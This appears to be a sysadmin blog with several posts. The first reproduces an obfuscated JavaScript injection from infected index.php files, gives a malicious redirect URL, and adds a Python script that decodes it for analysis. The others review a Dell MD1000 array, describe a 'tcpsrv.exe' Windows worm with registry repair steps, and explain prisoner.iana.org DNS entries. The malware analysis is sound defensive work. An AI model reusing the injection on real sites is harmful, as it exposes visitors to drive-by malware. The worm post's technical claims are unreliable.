Below is the JavaScript code of an “injection” that inserts itself into the index file of a website. It is designed to go undetected by redirecting only seldom and at random. It is placed at the bottom of the source code, with a significant gap of whitespace after the end of the regular source code (115 lines in all cases). In most of the cases that I have come across, it redirects to a “spyware” or “virus” site. It also goes undetected by antivirus programs (Trend Micro, Panda, Avast). It works in Mozilla (2.0.0.11) and IE7 (I haven’t tested it in others). I’ll look into it further once I decode the script itself.

One of the sites it redirects to is: http://e.pepato.org/e/adsr.php?t=0

It infects each individual .php file and does not re-infect after the initial infection. I have created new sites and cleaned infected .php files, and it has disappeared completely. It injects this code into .php (and .html) files about 115 lines below the last line. It ONLY infects index.php/html files in the root directory of the website; if you name your file index2.php, it will not be infected. The “modified date” time stamps DO change with the infection: there was a spread of 1 minute across hundreds of .php files. If you need a quick way to search all index.php/html files on a server, download Notepad++ and use the “search in directory” feature for certain strings of text. Alternatively, once you find the time stamp of infection, search for files modified at that time.

var mf=" shapgvba ejtf(c){ine ro,con=\"HcvfNU)z\\\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u\",olq=\"\",i,nnu,l=\"\",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T\"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\\an#B#S~Msi$\\aUSRel\\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T\"G]$KMG=GMMGMza\\a><\\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);

Looks like a newer one, I’ve heard reports of similar activity as far back as mid January.
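The injection above works in two layers: a letters-only ROT13 over the string mf is eval()ed to define the real decoder (rwgs) and its substitution alphabet, and rwgs then rewrites km symbol by symbol before document.write()ing it. The following Python script is an added worked example (not part of the original post and not the injection author's code) that reproduces both layers offline so the payload can be read without executing the script in a browser. It assumes that the alphabet as reproduced on the page lost a trailing space (the page shows 80 symbols, the decoder reduces modulo 81, and the payload only decodes cleanly with a space as the 81st symbol), that the curly apostrophe in km is the blog's rendering of a plain ', and that the JS string escapes have been resolved before pasting the values in.

```python
"""Two-stage decoder for the index.php injection quoted above (added example).

Stage 1: the injection applies a letters-only ROT13 to the string `mf` and
eval()s the result, which defines the real decoder (`rwgs`) together with its
substitution alphabet.
Stage 2: `rwgs` replaces every character of `km` that occurs in that alphabet
with the preceding alphabet symbol (wrapping at the ends), leaves all other
characters untouched, and hands the result to document.write().

Assumption: the alphabet as reproduced on the page has 80 symbols while the
decoder reduces modulo 81, and the payload only decodes cleanly with a trailing
space as the 81st symbol, so that symbol is appended when it is missing.
"""
import codecs
import re

# JS string values copied from the injection, with the JS escapes resolved
# (\" -> ", \\ -> \) and the blog's curly apostrophe restored to a plain '.
MF = r''' shapgvba ejtf(c){ine ro,con="HcvfNU)z\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u",olq="",i,nnu,l="",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}'''
KM = r'''<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\an#B#S~Msi$\aUSRel\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T"G]$KMG=GMMGMza\a><\/SeRJ:1>aUmxU</A~Msi$>U'''

MODULUS = 81  # the constant hard-coded in the injected decoder


def rot13_stage(obfuscated: str) -> str:
    """Stage 1: letters-only ROT13, the same transform the injection applies to mf."""
    return codecs.encode(obfuscated, "rot_13")


def extract_alphabet(decoder_js: str) -> str:
    """Pull the substitution alphabet (the first quoted string) out of the decoded decoder."""
    match = re.search(r'="((?:\\.|[^"\\])*)"', decoder_js)
    if match is None:
        raise ValueError("no quoted alphabet found in the decoded decoder")
    alphabet = match.group(1).replace('\\"', '"')
    if len(alphabet) == MODULUS - 1:
        alphabet += " "  # assumed 81st symbol, lost in the blog's reproduction
    return alphabet


def substitution_decode(payload: str, alphabet: str, modulus: int = MODULUS) -> str:
    """Stage 2: the arithmetic of rwgs(), i.e. shift each alphabet symbol back by one."""
    out = []
    for ch in payload:
        idx = alphabet.find(ch)
        if idx < 0:
            out.append(ch)  # symbols outside the alphabet pass through unchanged
            continue
        a = (idx + 1) % modulus - 1
        if a <= 0:
            a += modulus
        out.append(alphabet[a - 1])
    return "".join(out)


def decode_injection(mf: str = MF, km: str = KM) -> str:
    """Run both stages and return the HTML the injection would document.write()."""
    alphabet = extract_alphabet(rot13_stage(mf))
    return substitution_decode(km, alphabet)


def remote_script_urls(html: str) -> list:
    """Indicator extraction: absolute URLs referenced by the decoded markup."""
    return [u.rstrip("?") for u in re.findall(r'https?://[^"\\\s]+', html)]


if __name__ == "__main__":
    decoded = decode_injection()
    print(decoded)
    print("remote scripts:", remote_script_urls(decoded))
```

Running it prints the markup that document.write() would emit: a second script tag that loads a remote .js file from a look-alike analytics domain and appends document.referrer to the request, which is the piece worth blocking at the proxy and searching for across other index files. The same two functions work on other samples of this family as long as the decoder keeps the ((idx+1)%81-1) arithmetic; for a variant with a different modulus, pass it to substitution_decode.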


I purchased the Dell MD1000 15 disk Direct Attached Storage Array in November. The enclosure itself is a JBOD system (Just a Bunch of Disks) because the controller inside does not support RAID. The RAID functionality of the system is achieved through implementing a PERC 5/e or 6/e controller in the server itself. The MD1000 can be daisy-chained for a total of three units supporting 45 disks. The MD1000 has dual controllers and dual power supplies for redundancy – something that should be expected in an expensive (albeit inexpensive in enterprise terms) product.

I have it hooked up to a PERC 5/e dual SAS (x4-type external) controller that supports RAID 0, 1, 5, 10, 50. Dell says you can configure the controller through pressing CTRL-R after the BIOS, but the tools are lackluster at best. Be sure to download Dell’s OpenManage system.

Below is my final configuration for my database and file server.

  1. 1 – “hot-spare” 73GB (SAS 15K Seagate)
  2. 4 – RAID 10 – 73 GB (SAS 15K Seagate)
  3. 10 – RAID 10 – 750 GB (SATA 7.2K Seagate)
  4. 2 – “cold-spare” 750 GB (SATA 7.2K Seagate)

Why not RAID 5? I don’t want the write-penalty that RAID 5 comes with, especially on a database server with the 4 SAS drives. The SATA array is cheap enough at $160 CDN per 750GB drive.

Overall I am satisfied with the system. The main concern was reliability. When a friend of mine brought up the fact that he could have done it less expensively with a computer in a large case and a bunch of drives, I agreed. With the MD1000 you get dual controllers, dual power supplies, and the ability to connect to two servers, which also helps if you are in a cluster. If you need network storage, definitely get a SAN array (not to be confused with NAS).

I have a decent crop of benchmarks of the test system before I finalized my configuration. I’ll post it later today once I get to a computer with Excel (or OpenOffice) to do some graphs.


As most of you know, Windows is a hotbed of viruses (not virii), worms, and malware. I’ve had the pleasure of finding a new worm that attacks the TCP/IP service: tcpsrv.exe in the C:\Windows\System32\ folder. This file is needed for Active Directory and the Workstation Driver (ie. Client for Microsoft Networks). With this file removed, you cannot remote into your server, run active directory and as a result Exchange Server. You can, however, serve web pages just fine with IIS.

I have three antivirus “managers” on my internal and external networks: Panda Enterprise, Trend Micro ServerProtect and Avast Antivirus for Server 2003. My favorite is Avast because it is easy to use and “cheap.” The TCP/IP worm was not detected by Panda or Trend Micro. Avast only knew it was malicious and recommended quarantining or deleting it upon restart. If you delete it upon restart, or even quarantine it, your server will no doubt be crippled: you will not be able to log into your server through RDP (Remote Desktop).

When you try to login through RDP (Remote Desktop) you type your username and password and an error pops up: “Cannot log on. The Workstation driver is not installed.” “Workstation Driver” is the common name for Client for Microsoft Networks found in your network adapter properties. So how do you fix your server if you cannot log into it? Well, it takes some telnet and some creative FTP in the Windows directory, which I will explain in a different post. For now, you’ll need physical access to your server or someone with physical access that can follow instructions.

You can login to your server at the physical workstation no problem because only the RDP login utilizes the TCP/IP Service, unlike the regular workstation login. Because the TCP/IP service is missing or corrupted, the following services (all found in services.msc at the run command) will not work:

  1. Workstation (or client for Microsoft networks)
  2. Server
  3. TCP/IP Service
  4. RPC Locator
  5. Netlogon

The RPC Locator and Net Logon services depend on the Workstation service. All of these services should be set to Startup Type: Automatic and should be running on any machine. The Server service is what controls the domain controller, or lets your computer know WHAT it is. If you try to access Active Directory, an error appears saying “the domain could not be found” or “the computer is not part of a domain.” This is important for Active Directory and Exchange Server. The Server service requires the TCP/IP service to run. Steps:

1. Locate a fresh copy of tcpsrv.exe in a backup or in the i386 folder of the install disc. For Windows 2003 SP2 the latest revision is from 2006. Put it into the System32 directory and manually restart all the above services. If this works, fantastic: it was an easily contained worm. If not, read on.

2. If the above did not work you’ll need to go into the network adapter properties and delete “Client for Microsoft Networks.” You will need to restart after you have done this. Once restarted, re-install Client for Microsoft Networks. You will need your Windows 2003 CD. Restart again.

3. Verify that the startup type for the RPC Locator service is set to Automatic and start the service. Do the same for the Net Logon service but do not start it yet. Start Registry Editor (Regedt32.exe) and then click the DependOnService value under the key in the registry:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Netlogon

4. On the Edit menu, click Multi String, type LanmanServer on a line by itself, and then click OK. In the Services tool, start the Netlogon service. If you cannot start it, continue with the steps below. If it does start, then start the Server service and verify Active Directory Users and Computers opens and you can see the available users/computers.

5. If the above still didn’t work, you may also have a corrupt TCP/IP stack and corrupt Winsock2. You’ll need to restart your computer in “Directory Services Restore Mode” by pressing F8 after the BIOS information has been displayed. Once you have logged in, open Regedt32.exe and find and delete the following registry keys:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Winsock2

6. Locate the Nettcpip.inf file in your Windows\inf directory and open it in notepad. Find [MS_TCPIP.PrimaryInstall] and edit Characteristics = 0xa0 to 0x80.

7. Go into the properties of your network adapter and click “Install,” select “Protocol,” “Add” and “Have Disk.” In the “Copy Manufacturer’s Files From” box select C:\Windows\inf and click OK. Select “Internet Protocol (TCP/IP)” and click OK.

8. This allows you to remove the TCP/IP service from a domain controller (which was not possible before). Now in the properties box of the network adapter select “Internet Protocol (TCP/IP)” and click Uninstall. Once it has uninstalled, restart the computer in Directory Services Restore Mode again. Reinstall the Internet Protocol (TCP/IP) by going into the properties of your network adapter and clicking “Install,” then select “Protocol,” “Add” and “Have Disk.” In the “Copy Manufacturer’s Files From” box select C:\Windows\inf and click OK. Select “Internet Protocol (TCP/IP)” and click OK.

9. Restart your computer in normal mode. All services should have started. If not, verify the above services are set to automatic and try to start them manually.


With some of the servers I maintain, prisoner.iana.org shows up as a DNS entry in the system logs. Because of the name, it “looks” suspicious. It is nothing to worry about: there are no hackers, and nothing is wrong with your system.

IANA was the name of the organization that was responsible for handing out IP address blocks back in the day.

There was a need for a placeholder zone for the three blocks of non-routable addresses, so IANA set up three DNS servers: blackhole-1.iana.org, blackhole-2.iana.org and prisoner.iana.org.

If a system in the address range 192.168.XXX.XXX tries to register its PTR record without a local DNS server, it will try to register with prisoner.iana.org. Obviously prisoner.iana.org will reject the request, hence the many instances of this address in the DNS logs / Event Viewer.
